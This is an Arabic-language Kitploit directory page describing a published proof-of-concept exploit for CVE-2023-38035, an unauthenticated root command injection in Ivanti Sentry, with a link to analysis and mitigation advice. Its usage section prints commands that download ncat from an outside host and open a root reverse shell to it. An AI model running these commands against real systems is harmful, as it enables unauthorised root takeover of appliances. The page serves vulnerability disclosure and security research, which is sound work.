Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38035 — استغلال إثبات المفهوم لـ CVE-2023-38035، وهو حقن أوامر غير مصادق عليه في Ivanti Sentry يتيح تنفيذ أوامر جذر تعسفية وقشرة عكسية عبر ncat. | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2023-38035
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubhorizon3ai/cve-2023-38035

CVE-2023-38035

استغلال إثبات المفهوم لـ CVE-2023-38035، وهو حقن أوامر غير مصادق عليه في Ivanti Sentry يتيح تنفيذ أوامر جذر تعسفية وقشرة عكسية عبر ncat.

عرض المستودع
41127منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38035

POC لـ CVE-2023-38035 التي تؤثر على Ivanti Sentry

التحليل الفني

يمكن العثور على تحليل الجذر الفني للثغرة في مدونتنا: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive

ملخص

يستغل هذا الـ POC حقن أوامر غير مصادق عليه لتنفيذ أوامر عشوائية كمستخدم الجذر.

لا يسمح سياق التنفيذ بتوصيل الأوامر، ولا يحتوي النظام على ملفات ثنائية سهلة الاستغلال، لذا يمكن ربط الأوامر لتنزيل ncat ثابت من مكان مثل https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.

الاستخدام

python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

شيل

التخفيف

قم بالتحديث إلى أحدث إصدار وفقًا للتعليمات الواردة في إرشادات Ivanti

  • https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US

تابع فريق Horizon3.ai Attack على تويتر لأحدث أبحاث الأمن:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا إذا تم التصريح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين أو liable عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة